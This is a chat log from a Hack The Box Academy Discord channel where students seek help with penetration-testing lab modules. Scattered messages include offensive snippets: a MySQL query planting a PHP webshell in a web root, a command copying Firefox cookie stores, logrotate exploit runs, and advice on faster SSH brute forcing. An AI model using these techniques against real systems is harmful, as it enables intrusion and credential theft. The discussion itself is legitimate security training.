#modules

1 messages ยท Page 102 of 1

heady tusk
rustic sage
#

Cant access it ? Why is that

#

Thank anyway

acoustic owl
unborn shard
mortal shadow
#

PLEASE HELP: like a few hours to scrape - please edit this section and explain it with ffuf
Burp Intruder is hella trash with the community version

robust pecan
#

Hi ๐Ÿ‘‹. On the Linux Fundamentals module, in the File System Management section, we have to look for the Size in GiB of the โ€œ/dev/sdaโ€ disk on Pwnbox. I tried โ€œsudo fdisk -lโ€ and โ€œsudo fdisk -l /dev/sdaโ€ but I canโ€™t see the disk. Also tried โ€œlsblkโ€. Is something wrong with the section or am I missing something?

livid zephyr
#

On the password module, credential stuffing, how long did take you to brute force Kariโ€™s password? (I donโ€™t recall if that is the right name for the MySQL credentials exercise).

summer lava
#

HI Guy.. i have ONE module left to complete the Penetration Tester Path... what advice do you have

trail leaf
#

do it

proud pine
acoustic owl
mortal shadow
#

with burp i stopped after running for an hour (not even 10% of the list were done at that point)

acoustic owl
#

The module is about web proxies, so ffuf would definitely be the wrong tool

mortal shadow
#

yes

#

like 1 retry every 2 seconds

#

extremely extremely slow

proud pine
#

ZAP is always an option.

acoustic owl
#

Even if it would take 2 seconds for each request, you would be through after 100 seconds ๐Ÿ˜‰

mortal shadow
#

same settings as in the example above

#

gave me 403 for the 2010 endpoint in burp

balmy saffron
#

Hello,
These days I experience a lot of black screens with xfreerdp in the AD labs.
Is there any workaround?
xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:10.129.62.8
or wihtout the quotes - same results.
I restarted the target and the pawn box. Same problem from my own kali machine.

balmy saffron
#

OMG it works.

#

thank you so much

#

Makes me feel stupid.

cedar void
#

kills assessment module user 7: "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "

I am not sure how to authenticate the Domain controller host at 172.16.5.155 via ssh after I logged into the target host. How do I ssh to the address '172.16.5.155' if I don't know the password or username ? This skill assessment is from the 'introduction to the windows command line' module

atomic thicket
#

re this: figured out how to move files but for some reason all of the processes started from a non interactive shell die immediately (so I have been unable to upgrade the shell)
not sure if that is by design

trail leaf
#

If you're in a noninteractive shell, you could try to run a single command to add yourself to the administrators group or manipulate things that way. Figure out ways to do things without having the interactive prompt :)

atomic thicket
#

smart

#

thanks

mortal shadow
rustic sage
#

For this one you might need to try coding a script

#

I think you can do it with burp as well, just not sure

#

If you need help, dm me.

true plank
#

Hello, I create CTF challenge content for youtube and a while ago I shared a recent HTB challenge as I didn't know it wasn't allowed. Today, the challenge is already retired and I would like to know if I can re-upload the video to YouTube without violating the platform's rules. I don't know which channel to post the question on, if not here, I apologize. Thanks!

vocal tusk
#

i dont have acces to rockyou.txt

#

is that a normal think in the hack box

#

apparently i dont have permision to view file

#

is there a trick to it guys or just download it from github job ?

pine dagger
#

If you're on a pwnbox, its there

#

sudo find / -name rockyou.txt

vocal tusk
#

and rok you litteraly has a red x on it

#

and warning that i don not have permision to open this file

modern falcon
#

Try chmod?

vocal tusk
#

good idea

#

it worked for some reaason its not owned by the user its owned only by sudo group

#

but strange the rock you form the pwnbox found the password for exercise in less than a second

#

the rock you i downloaded from google spent a good 2 hours and no hit

misty mural
#

I'm on the Password Mutations page of the Password Cracking module. The question states to mutate the password list in the resources file and then brute-force the ssh credentials of a named user. There are 94,000 passwords in the mutated list and a few hours of processing time for the brute-force.

Is this the best way forward for the module or am I missing a "Think Outside The Box" opportunity?

rustic sage
misty mural
rustic sage
misty mural
rustic sage
misty mural
rustic sage
#

btw, I think chatgpt can easily write you a script to perform faster ssh bruteforce, paramiko + custom timeouts + threading should be enough

#

but the module wants you to use certain other tools so you can learn

rustic sage
thorn urchin
#

faster ssh bruteforce is a bit of an oxymoron

modern epoch
#

Hey guys, I would like to contact vautia to ask something about the new module Whitebox Attacks. I think we have one issue with the section Authentication Bypass, so I would like to ask him. If someone already solved the module as well please dm! Could someone please help with his contact?โ†‘

thorn urchin
muted fiber
#

Hey everyone, I'm considering the silver annual plan, but I don't really understand some of the perks listed on the website.. does anyone here have this annual subscription and would be willing to answer some questions in dms please?

quaint hemlock
#

Hello, I'm on Linux Privilege Escalation Module Logrotate section,
it tells me to git clone logrotten but when I did git clone https://github.com/whotwagner/logrotten.git it response with fatal: unable to access 'https://github.com/whotwagner/logrotten.git/': Could not resolve host: github.com, anyone know what's wrong?

I found out the git clone is only fail when I was on ssh

rustic sage
#

Are you trying to clone that repository into your exercise machine?

quaint hemlock
#

I can clone it when not on ssh, but fail on ssh

rustic sage
# quaint hemlock yep

Machines inside VPN cannot communicate to the outside, they can communicate to other machines within the same network. Clone that repository in your attack mv and transfer it to your target.

#

Your machine can communicate with the exercise's vm.

#

Only if you are connected to the VPN...

quaint hemlock
#

is it also working if I use windows?

fathom pendant
#

Elaborate

#

Is your attack system windows

quaint hemlock
fathom pendant
#

Because boxes don't have internet access

#

As they literally just said

rustic sage
#

This section is quite difficult so my suggestion is just transfer the repository and play around it

quaint hemlock
rustic sage
#

May I ask why you want to do that?

quaint hemlock
#

because It's on the modules?

#

I'm on Linux Privilege Escalation - Logrotate

rustic sage
#

Are you using a local VM for performing attacks or do you have pwnbox?

quaint hemlock
#

I'm using pwnbox

fathom pendant
#

They are using pwnbox

#

Screenshots show

rustic sage
rustic sage
fathom pendant
#

Either way: File Transfer

fathom pendant
#

I was referring to your previous screenshots

quaint hemlock
fathom pendant
#

Like you're not actually reading some of the help given to you

#

But generally when you're told or given a tool, it will be on your pwnbox/local vm

#

Generally not going to be on the target system unless specified

quaint hemlock
#

thx, problem solved

quaint hemlock
#

how long will this command take to show result?
./logrotten -p ./payload /home/htb-student/backups/access.log, been waiting still no result

acoustic owl
quaint hemlock
acoustic owl
#

When the logfile rotates, your payload is executed

quaint hemlock
acoustic owl
# quaint hemlock where?

No idea what is in your payload.
But as soon as the logfile rotates, what you have defined in your payload is executed.

vital helm
#

Hi, I encountered the same problem. Did you manage to figure out what to do?

edgy shell
#

Good morning. I am having some difficulties with the knowledge check in the getting started module. I am on the last part and I am having trouble with privilege escalation after I have established a meterpreter connection.

My progress so far:
I know the username and password to log into /admin/ - This user is not able to log on to ssh though
I have gotten a meterpreter connection on the machine and I can read the user.txt flag
When I try to access root I am not able to. I have tried the following:
I searched for ssh files on the target I can use but have not been able to find any.
I can not run any equivalent to the monitor.sh from earlier in the module as sudo(as far as I can tell)
The website is extremely slow, so any file upload is out of the question it seems
I tried to get priv/getsystem in meterpreter, but no luck.

TLDR: I have shell but I need help getting root.

Any nudge in the right direction would be of great help.

clever crow
#

Hope it helps

#

Respects to you finding this message

silk void
#

How is the delivery of the htb certifications, if they are sent to you personally or only online?

summer lava
#

Alright thanks

real copper
heady tusk
vivid igloo
#

cant copy non :copy $env:APPDATA\Mozilla\Firefox\Profiles*.default-release\cookies.sqlite .

umbral wigeon
#

Need some help for Attacking Common Services - Easy https://academy.hackthebox.com/module/116/section/1466

||I am trying to upload a phpshell via mysql. From http://<IP>/dashboard/phpinfo.php i figured out the webroot to be C:/xampp/htdocs/dashboard/
I proceeded to upload using SELECT "<?php system($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/dashboard/webshell.php';
And then tried some commands http://<IP>/dashboard/webshell.php?c=id but it didnt work
I can confirm my shell is uploaded because of the error messages when i do not supply the 'c' parameter. I also tried uploading html files and it worked fine too

Also went to the faq.html page and got
PHP:
Executable: \xampp\htdocs and \xampp\cgi-bin
Allowed endings: .php
=> basic package

Tried to read the config files like C:\xampp\php\php.ini with select LOAD_FILE but everything returns NULL||

heady tusk
cedar void
#

If I wanted to look inside any of these modules listed how would I do that?

umbral wigeon
coral wraith
#

Hi,
Please, How can Enumerate the "flagDB" database and submit a flag as your answer?
On the Attacking SQL Databases
Attacking Common Services :
https://academy.hackthebox.com/module/116/section/1169

I get the password for mssqlsvc, but login failed

[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.

pine dagger
rustic sage
#

Can anybody help me in attacking common applications section attacking splunk i can't get a reverse shell

#

Im using netcat but doesn't work

sweet jewel
#

does the htb team ever intend to have asia vpns for academy

tall matrix
#

Hello everyone, just looking for someone to DM real quick. I'm trying to find a Wordpress public exploit in the Pentest basics module but can't seem to find any open services. Thank you.

vocal tusk
#

hi guys im on the brute force skills assesment it says to do it wit hydra but im looking at a 50 h+ brute force attack and anotner one after it. i have a 5700xt in my pc any way i can use that to do the gruntwork ?

#

my Kali is in a virual environment tho

hollow finch
#

Working on SAM password attacks module...I'm able to establish the server after making copies of sam.save, security.save and system.save. When I go to use the "move" command per the instructions, I'm getting an "access denied" error...any help would be appreciated! ๐Ÿ™‚

fiery berry
rich wigeon
#

Hi everyone, good evening. I would need some help on the Attacking SQL Databases module, I am trying to log in with the first user the one that passes the academy but apparently I can't get in. It keeps giving me the error

RROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I have tried any type of authentication and any tool, even written in the forums but nothing. Has anyone by any chance completed the challenge?

ebon coral
tall matrix
fiery berry
# hollow finch via smbserver.py...

cause probably access denied is due to the unauthenticated guest transfer, I honestly don't remember the error. Can you paste the impacket-smbserver command between spoiler tags? EDIT: dm you

slate palm
#

Im on AD Enumeration & Attacks - Skills Assessment Part II and c**** doesnt want to click my links ๐Ÿ˜ข

rich wigeon
# fiery berry which user?

The first one, htdbuser that academy gave to us. I use the mssqlclient and i try every possible combination but nothig. I receive back the same error

mortal shadow
#

What is the index number of the "sudoers" file in the "/etc" directory?
ls -i /etc/sudoers
what is wrong right there?

hollow finch
#

@fiery berry so the share is established...thought perhaps running cmd as admin would rectify the issue but no

fiery berry
zinc marsh
#

Time to start Dante. Let's see how it goes ๐Ÿ™‚

mortal shadow
#

no

#

terminal

iron plaza
#

there is nothing wrong with the command so i thought if it was the pwnbox then refresh it but if you are using vpn it could be something else

mortal shadow
#

1360934 /etc/sudoers

#

looks good to me too

iron plaza
#

so whats the prob?

mortal shadow
#

answer is wrong

iron plaza
#

which module and section is this?

mortal shadow
#

nvm seems like i disconnected from the target

#

sorry - thanks for your help!!

iron plaza
rustic sage
#

Does anyone here have issues with the VPN connection to HTB

#

Because mine is kinda tripping

slate palm
#

change servers and/or protocols

rustic sage
violet tundra
#

Hey, i think I got a problem in module SHELLS & PAYLOADS > Antak

I didn't have antak installed so I installed it, and i only get:

/usr/share/nishang/Antak-WebShell/antak.aspx from locate (and find) command

#

I will try connecting to the academy box

#

Okay the academy box has it, my bad

vital adder
slate palm
vital adder
brazen ore
#

Am i missing something here? that username isnt in the txt at all. even just looking through the entire thing with cat

#

wait a second i might be dumb

vital adder
brazen ore
#

am dumb confirmed

coral wraith
coral wraith
rustic sage
#

hie

mortal shadow
#

problem with VPN connection https://academy.hackthebox.com/module/144/section/1256

  • already running vpn file in background
  • added adress in etc/hosts

โ””โ•ผ$ nslookup -type=NS inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN

fathom pendant
#

You need to do the nslookup on the ip

zinc marsh
#

๐Ÿ˜ฎ

valid cipher
#

does anyone know what csrfmiddlewaretoken is? and will it prevent me from brute forcing a login page with hydra

valid cipher
#

already did

#

dont get

fathom pendant
pine dagger
narrow solar
#

good day friends, i am at Active Directory Enumeration & Attacks, Bleeding Edge Vulnerabilities, i am getting this error at Requesting a TGT Using gettgtpkinit.py

narrow solar
#

i tried attacking from win host, and this what i get

mortal shadow
#

i was able to solve 1 and 2

#

but stuck again for hours

#

clueless

vagrant gust
#

rdp is not up for me in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section of the pivoting tunneling and port forwarding module

#

ive restarted the pwn box

#

got a new ip address but still cant connect

mortal shadow
#

section isn't helping with commands

#

used all commands of that section and found nothing useful

#

obviously

#

idk other modules are good imo, but this one is really bad (commands are poorly described compared to others)

#

been stuck with this for days and learning literally nothing

civic zenith
#

Im on MSSQL of the Footprinting module and I'm logged in via mssqlclient.py . But none of my SQL commands are working. What am I doing wrong?

#

I also posted my issue in 'community help'

hidden pecan
#

Hello, I would like to insert the file 'shell.php' present on my machine in the link of the site on the module
https://academy.hackthebox.com/module/23/section/254.

When I put my ip followed by the port and the file name, I get the following error:

Warning: include(http://xxx.xxx.xxx.xxx:xxx/shell.php): failed to open stream: Connection timed out in /var/www/html/index.php on line 47

Warning: include(): Failed opening 'http://xxx.xxx.xxx.xxx:xxx/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index .php online 47

Notice: Undefined variable: p2 in /var/www/html/index.php on line 48

sweet jewel
mortal shadow
#

anyone also got the "error: virustotal probably now is blocking our requests" with sublist3r?

mortal shadow
#

ahh okay

#

i wasn't sure, because there was no output

#

hmm also for other domains nothing is being output

#

weird

#

anyone experiencing something similar?

kind fern
#

In "AD Enumeration & Attacks - Skills Assessment Part I" why I can't find t*** password, while I used mimikatz->privilege::debug->sekurlsa::logonpasswords, and also I used 'LaZagne.exe all'

pulsar needle
#

Try to read about AD

#

Have you done the "introduction to AD" module?

pine dagger
#

Difficulty of Q2 depends on how you did Q1. If you did it like I did, then you should have a shell on the machine with enough privileges.

#

Try using that shell to interact with something like PowerShell, and use some of the tools discussed to grab the SPN accounts.

#

Yes

#

AD Enumeration is one of the modules that I personally found very difficult (I rate it as the hardest module). Its the only one I got stuck on for more than 1-2 days. But honestly, all the commands you need to run to find the answers are in the content. You just need to find the right one for the question. ๐Ÿ™‚

tidal mango
#

Is there anyone who has completed the Broken Authentication Skill Assessment that I could bounce a question off of? I have completed it a while back and was reviewing it, and there is one part that I wanted to check with someone else about.

pine dagger
tidal mango
pine dagger
#

Sure.

#

Can't promise I'll remember anything, as it was awhile back.

tidal mango
pine dagger
#

Well, there seems to be an obvious thing to do then :p

#

There really needs to be an additional list in Discord. "People who are allowed to DM you". ๐Ÿ™‚

mortal shadow
#

Can anyone help me with these: (https://academy.hackthebox.com/module/144/section/1256)

  • 1 What is the FQDN of the IP address 10.10.34.136?
  • 1 What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer.
  • 1 Submit the number of all "A" records from all zones as the answer.
pine dagger
#

Are you running directly from the shell, or something else?

#

Try running powershell from the shell

pine dagger
#

Tried using msfvenom and meterpreter?

mortal shadow
proud pine
#

Did you run the command without first running
Add-Type -AssemblyName System.IdentityModel

proud pine
#

Try to add the type first.

mortal shadow
#

but can't find these ips in the list

acoustic owl
proud pine
#

You need to verify to post screenshots.

mortal shadow
acoustic owl
proud pine
#

Not much I can help with, unless I can see everything you're doing.

pine dagger
#

I assume that Discord ate the stars there... you should have the answer right there.

mortal shadow
#

restarting my vm, one sec

short gulch
#

omg this DNS module gave me headaches too

acoustic owl
short gulch
# acoustic owl Why?

well you need to pick specific list to brute force, without discord i wouldnt get it in miljn yers

acoustic owl
mortal shadow
#

ok done with this module lmao

#

pure pain

acoustic owl
acoustic owl
short gulch
mortal shadow
short gulch
#

This footprinting dns module, in a real world scenario, it only would work if an attacker does enumeration and zone transfer from the "trusted" machine? So it would only work if one would gain acces to a machine first?

acoustic owl
#

This section is about understanding that DNS is organized into zones and how they work.

#

You would hardly attack a DNS server like this

short gulch
#

Ok thanx

acoustic owl
#

In a real scenario, you would hardly be able to send 5000 DNS queries to the name server in such a short time. You would be blocked much earlier

thorn urchin
#

idk in my experience nobody cares about dns queries

short gulch
#

But if we talk only about the dig axfr command. It would potentially only show results if an attacker is "in the network" first?

thorn urchin
#

how short is short

#

Ive fired off 5k+ queries without issue plenty of times

#

subbrute irl go brrr

acoustic owl
acoustic owl
thorn urchin
#

yeah of you actually ddos it ofc

grizzled wind
#

with which format?

thorn urchin
#

thats definitely not correct

#

review the section notes

#

then you have to google for john to find the proper format, or follow the hashcat instructions provided

trail leaf
grizzled wind
#

help.

mortal shadow
#

what's wrong there

#

are we also supposed to find subomains/directories ?

grizzled wind
mortal shadow
#

huh?

acoustic owl
trail leaf
grizzled wind
mortal shadow
#

all responses are 986

#

sadly there is no hint too

mortal shadow
mortal shadow
#

task says to do parameter fuzzing on the target

grizzled wind
#

no cracking for today

tidal mango
mortal shadow
tidal mango
tidal mango
mortal shadow
#

no it isn't

#

and without the filter i just get spammed

#

everything in that list returns a status code 200 with length of 986

tidal mango
#

can you screen shot a snip of the output?

mortal shadow
#

cant send pictures here

tidal mango
#

I think you need to be verified and then you can.

mortal shadow
#

where?

tidal mango
#

I have a meeting for work I have to jump on, I'll check back when I'm done.

mortal shadow
#

thanks!

grizzled wind
#

i want to go to sleep

mortal shadow
#

ok now

grizzled wind
#

DMED

minor bronze
#

hello guys, I'm new here, and an average person in the whole field of programming, please tell me where to start, I would like to learn how to quack, hack programs, as well as write cheats / injectors for different games. Tell me, maybe some courses, programming languages , people who can teach in Ukrainian. I will be very grateful in advance!

zinc marsh
thorn urchin
minor bronze
thorn urchin
mortal shadow
grizzled wind
#

all this time no one could told me that output from that payload for ipmi hashes exploit to get that hash would be in directory named true , i cracked it with it in 1 sec .

#

idk why you like to make fun of students.

thorn urchin
#

Nobody made fun of you

#

All I said was to either follow the instructions provided in the section or if you wanted to deviate, youd have to google the difference

#

I never messed around with any directory named true, sounds like you did things a slightly different way than most others, good job.

zinc marsh
#

we are all students for life here

rustic sage
red current
#

I think the PRTG Network Monitor section in Attacking Common Services needs to be either removed or completely redone. I get different results for my VM as opposed to the pwnbox and neither one actually brings up the correct site when navigating to the provided ip address. In my VM it takes to a Splunk server whereas in the pwnbox it takes me to a Windows server. The provided username and password of prtgadmin:Password123 doesn't work on either.

pine dagger
# mortal shadow please help me :(((

Without being mean or acting as some kind of gatekeeper, things are only going to get harder from here. It would be a good idea to spend more time learning how the tools work, etc, rather than jumping straight into chat everytime you immediately can't solve something.

That said, without seeing your fuzz command, I couldn't say for certain what your issue is. But there's two things that make this very solvable. First thing: You should be using the FQDN, not the IP address (modify the hosts file to add the given IP address as a reference for admin.academy.htb). Second thing is to know what the size of a failed page is. So run it, and see what the size of the failing parameters are, and then filter them out with fuff filter options.

tidal mango
lapis lion
#

Does anyone know if openvpn has problems with 2019 Kali?

#

Cant get openvpn to connect, I started the first lesson "Meow"

pine dagger
red current
pine dagger
#

Most likely explanation is possibly config got jammed?

#

Id try restarting the pwnbox and close any other tabs in other chapters, and then restart the prtg machine

red current
red current
pine dagger
#

I remember having to try a few times to get it to fire.

red current
red current
# pine dagger

Thank you. I'll take a look at it again later when I have more time. I'm nearly finished with the Attacking Enterprise Networks module.

red current
#

Okay, I'm stuck. I really don't understand this section of the Attacking Enterprise Networks. It's the Exploitation and Privilege Escalation section. The first step is to navigate to the DNN site at 172.16.8.20 on port 80 and I can see using nmap that port 80 is open. I just can't navigate to it in the browser. It gives an error of problem loading the page. Anyone seen this before and able to assist? I have a feeling that I might be missing something obvious, but it's been a very long day at work and my frustration level is pretty high.

tight mesa
#

hello everyone, I'm stuck with Password Attack Module/Network Services section

#

I'm trying to enumerate the WinRM user but, after several intents with different couples SecList dictionaries I can't find it

#

anyne can share what is the best dictionary to use?

trail leaf
#

Click the resources link at the top right, there are wordlists there for you to use

tight mesa
#

ohhhh sorry I dind't saw it, ty.....

trail leaf
#

don't worry, basically everyone who has done the module has run into this issue

zinc marsh
#

someone know why I get fake negative with wpscan?

#

and I am using the username and password which I used to log in

#

oh lol it works without the --password-attack xmlrpc

#

although xmlrpc is enabled

rustic quiver
#

Hello everyone, I am stuck on the setting up module. I am trying to install ParrotOS and set up the VM but the disc image file wont show up so I can't select it, any idea on what could be going on?

latent sigil
#

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. ATTACKING COMMON SERVICES god damn i hate dns

#

is there anyone able to help me with that module

umbral wigeon
quaint hemlock
#

Hi, I'm on Linux Privilege Escalation - Sudo
the instruction told me to do make after git clone and cd, but it responds with this instead -sh: 43: make: not found
I tried to skip it and continue to next step and have the same problem when I supposed to run gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c which return -sh: 41: gcc: not found
can anyone help me with this?

latent sigil
quaint hemlock
#

what?

latent sigil
#

give me a sec youre missing a dependecy

#

ill find it for you

#

what is the program you want to install

#

try this: configure

#

make

#

make install

trail leaf
#

That pass the ticket section in Password Attacks was probably the most valuable thing in that whole module and definitely feels like it belongs in the active directory modules instead kek

latent sigil
quaint hemlock
#

can't use sudo

latent sigil
#

are you doing this on the attack machine or on the target

quaint hemlock
#

target

latent sigil
#

oh

#

uhhh

#

i havent done the module yet but i can try along

#

dont try that technique

#

try the last one

tight mesa
#

hey people, I'm stuck with Password Attack Module/Network Services section

#

any hint how to find the Flag for the 1st question..!!!

#

I found the user & passwd and, get connected via evil-winrm but {I had to find some info how to use it} and when I wrote "menu" I don't know what else to do....

#

via xfreerdp I received a cert error message/connection unsuccessful

#

I tried also via smbclient {CASSIE folder} with no success either....

#

any hint?

trail leaf
#

Once you've connected via winrm, you have access to a noninteractive windows shell

#

so you just run windows commands on the command line

#

if you don't know how to do that, time to do some research

tight mesa
#

ok., I typed DIR & nothing happen

trail leaf
#

screenshot?

tight mesa
#

I got it...

acoustic owl
trail leaf
#

Can I DM someone about the shells and payloads skill assessment? Not asking for help, wondering if something is intentional or not. nvm, definitely unintentional but we take those

foggy light
#

+++rep @carmine hill
Bro helped me a lot explaining and was very patient with me !! I love this community!!

torpid ermine
#

Anyone please give me a nudge on this osint corporate recon module question "Investigate the website www.inlanefreight.com and find out how much EBIT they recorded for the third quarter of 2020 and submit it as the answer. (Format example: GBP 000,000)"

brittle herald
brittle herald
#

Sorry, no

torpid ermine
#

ok thanks man

brittle herald
#

Np dude, happy to help

foggy light
torpid ermine
vital helm
#

Hi, I encountered the same problem. did you manage to find out what to do?

ebon coral
pliant flower
vital helm
# ebon coral What are your settings for the options? What output are you getting after runnin...

I ran this auxiliary(scanner/http/wp_simple_backup_file_read) with RHOSTS as the target IP address and RPORT as the target port specified

i received this output:
+] File saved in: /home/htb-ac-859516/.msf4/loot/20230711064349_default_83.136.250.34_simplebackup.tra_648173.txt
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

and opened the .txt file

but did not find anything useful from there

ebon coral
vital helm
# ebon coral There's another option that should be set.

I tried both: set TARGETURI /simple-backup and set TARGETURI /root/simple-backup

I received this output for both separately:
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

but was unable to find the relevant file

autumn pilot
#

Read the question again

#

And the exploit's option descriptions

modern epoch
#

Finally completed the module Whitebox Attacks!!

Definely it's the hardest module in academy till now, but the effort is well worth it!!

Congratulations for all involved, and especially for the author Vautia, incredible!

acoustic owl
grizzled wind
vital helm
# autumn pilot And the exploit's option descriptions

sorry I am super lost. I tried to set TARGETURI to /index.php/2021/02/11/hello-world/ which was what I got from the webpage, but still did not return anything useful. I also tried to set FILEPATH to /flag.txt but encountered the same output. any hints? thank you so much!

slate palm
#

OwO just finished the AD enum & attacks module and it looks like Im hooked now

gritty galleon
#

QAQ

#

stuck in here

pine dagger
vital helm
fiery berry
gritty galleon
#

thx a lot QAQ

pulsar needle
#

How am I supposed to footprint a service that isnt up on the target?

vast geyser
#

Hello guys, I have a question about Meterpreter Tunneling & Port Forwarding in the PIVOTING, TUNNELING, AND PORT FORWARDING module
I have connect the reverse shell by meterpreter but I don't get the session ID as below picture:

autumn pilot
pulsar needle
#

It didnt come up on my NMap scans but i could connect to it

#

or

#

yeh

#

weird stuff

#

lol

autumn pilot
#

Which protocol utilizes IPMI

pulsar needle
acoustic owl
pulsar needle
#

ok

#

NO, its UDP

#

Lol

#

aaaa

fathom pendant
#

also make sure you're doing the right commands to background the session and not close it

valid cipher
#

i need help

acoustic owl
#

Just ask your question

ocean ferry
warm drift
#

someone please explain the difference betwee NAT and Bridged in Vmware

fiery berry
#

dm you

karmic dagger
#

I am attempting to download the id_rsa file from the Attacking Services - SMB module, but the file doesn't download and appears to get stuck. I'm using the following command: smbmap -H 10.129.232.131 -u jason -p XXXXXXXXXXX --download ".\GGJ\id_rsa"

fiery berry
vital helm
#

Hello, im at the module "Getting started" 'pentesting basics/priviledge escalation'. managed to gain access as user2, but I am unsure how to proceed to escalate my privileges to root. I have explored the root directory and only found flag.txt but I am unable to read it with user2. I am also aware that there is a key and key.pub file in user1 but I am not too sure how to proceed from here. help please, thank you!

karmic dagger
fiery berry
karmic dagger
ebon coral
modern epoch
modern epoch
drowsy bane
#

Hey guys, a bit stuck with the logrotate lab in linux privilege escalation, I've looked through all the cron jobs, but can't find anything that looked like it was rotating quickly enough to be what we were looking for?

trail leaf
#

Try appending some data to a logfile that you think could be rotated and see what happens. The box is set up so you don't wait forever for a log to be rotated, so if you add some data, and that data eventually disappears, that's the log you want to use.

drowsy bane
#

but surely theres got to be a better way of going about it than just trying to append to different log files? Like, I tried to create a 'find' script together to show me the 50 most recent files created on the system, if something is rotating, woul that not show up?

#

happy to be wrong, just trying to think of other ways I can use to make this easier in the future ๐Ÿ™‚

trail leaf
#

I think a find would work

plain coral
rotund urchin
#

Can someone assist with the Privileged access section of AD Enumeration and Attacks module? "What other user in the domain has CanPSRemote rights to a host?"

#

i did both bloodhound query and powerview query and there is only 1 user in the group and its not the right answer.

plain coral
alpine glade
#

Hi to all! Please HELP! Stuck on third question of Living of the Land module. "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer." Just any ideas how looks this flag? dsquery command print out nothing.

clear adder
#

Hello. I can't submit the flag in this 'meow' module in the starting point. It literally says that 'Meow root is already owned'

#

I have never done that machine before

trail leaf
#

Read the description of the skills assessment, it gives you some important context.

tight mango
#

I deleted it but someone saw it. I just noticed it ๐Ÿ˜ณ

#

@trail leaf thank youuu mate

#

I just lose two hours trying to craft an upload request -_-

trail leaf
#

Pretty sure the upload page doesn't have a filter though, so it shouldn't be that much harder even if you don't have context ๐Ÿค”

tight mango
#

@trail leaf maybe. It would be interesting if smn did it like this

pale oriole
#

Would anyone be able to help me out with the DNS section of the Footprinting module? Really struggling with the question "Identify if its possible to perform a zone transfer and submit the TXT record as the answer"

acoustic owl
#

What exactly do you want to do? What is the problem?
The command seems to be ok so far. But without context I can't help you.

acoustic owl
mortal shadow
#

working fine now

green delta
#

Hi, I'm having problems solving the medium lab for Firewall and IDS/IPS Evasion (nmap enumeration). I've tried a ton of different things/scripts/options and I even resorted to looking up two different write ups which show slightly different output to what I'm seeing.

I have to find the target's DNS version, but all I can see is the version being 'NLnet Labs NSD' instead of the htb flag. I even copy/pasted the nmap command from the write ups with my targets IP but I don't see the htb flag as shown in the writeup

pale oriole
# acoustic owl What have you tried and what doesn't work?

I first did a "dig axfr inlanefreight.htb @ip_address" which yielded some subdomains, then I did "dig axfr subdomain.inlanefreight.htb @ip_address" one of them gave me even more subdomains. Did the same thing on those. Then thought I needed the TXT from them so then on all of the subdomains I found I did "dig +short TXT subdomain.inlanefreight.htb @ip_address" but I got nothing from everything.

acoustic owl
#

When you perform a zone transfer, TXT entries are also transferred. A zone transfer with AXFR always transfers the complete zone.

pale oriole
pale oriole
vocal tusk
#

hi guys im on Broken Authentication The Weak Bruteforce protection. im using the script changed it arround and using an ip that i think it should trust but i think the list im using isnt right

#

could anyone point me in the direction of the list is it the csv from the script or is it another one and we have to eddit the script function to read diferent files ?

mortal shadow
#

can someone explain me why i need to add any subdomains found via vhost-fuzzing to hosts?
i'm mapping hostnames to the target IP, but how does this work:

iron plaza
mortal shadow
#

could i set it as *.academy.htb instead

#

so i don't need to set every subdomain?

trail leaf
#

You can try that, but I donโ€™t think wildcard characters work in /etc/hosts

iron plaza
mortal shadow
#

can i imagine it like this:
when i try to ping/fuzz/whatever the FQDN needs to mapped to an IP so it knows where to find the address?

#

and i also add any subdomain in there as the host will remain the same

iron plaza
mortal shadow
#

yes, but all domains/subdomains have the same host in the case above

#

that's what i mean

iron plaza
mortal shadow
#

yes have experienced that too xd

clear adder
trail leaf
#

I was responding to someone else, and they deleted their message ๐Ÿ˜…

#

I don't know how to resolve your issue, but if you have the root flag, and the system says you have it, I think that's fine ๐Ÿคทโ€โ™‚๏ธ

rustic sage
#

Hi, could anyone guide me a bit regarding the File Inclusion Skills Assessment? I've made all the way it to the point where I only need perform Server Log Poisoning, place a Web Shell there and then access ist; the php code just doesn't get displayed or executed

trail leaf
#

Are you looking in the right spot for your shell?

silent sleet
#

hey I just realized that my discord is pulling in my old HTB account that I haven't used, not my current active one, any way to change that?

trail leaf
#

you could probably just leave the server, come back, and reverify

#

but wrong place to ask this

silent sleet
#

tried that

#

alright, ill ask support

trail leaf
rustic sage
#

Got it now, was indeed looking in the false spot ... or to be exactly, I just didn't find the output anymore, because it was being displayed right within the logs, so impossible to find without some highlighting along with the injection

thorn urchin
#

thats what eyeballs are for

acoustic owl
#

yes

mortal shadow
#

is it the 10 million wordlist

acoustic owl
mortal shadow
#

all other ones would make no sense

#

if my target wouldn't always need to be reset

alpine ridge
#

Hi is anyone able to help me with sau

acoustic owl
mortal shadow
#

same issue as before

vital quiver
#

something is shot with my FFUF - Skills Assessment - Web Fuzzing my results for question 1 return test, archive, faculty , non correct answer, hints for wordlists please.?

rustic sage
#

Finally !!!!

vital quiver
#

@mortal shadow any hints for me on Skills Assessment - Web Fuzzing - wordlists to use?

mortal shadow
#

which question

vital quiver
#

1

mortal shadow
#

link

#

pls

vital quiver
mortal shadow
#

try different formatting

vital quiver
#

LOLz

#

No way man my engrish suc

#

I am a๐Ÿฅœ

#

@mortal shadow thanks man \o/

zinc marsh
#

someone could help me setting up ligolo-ng? I have always used socks or chisel

frail summit
#

Hii all

zinc marsh
rotund urchin
#

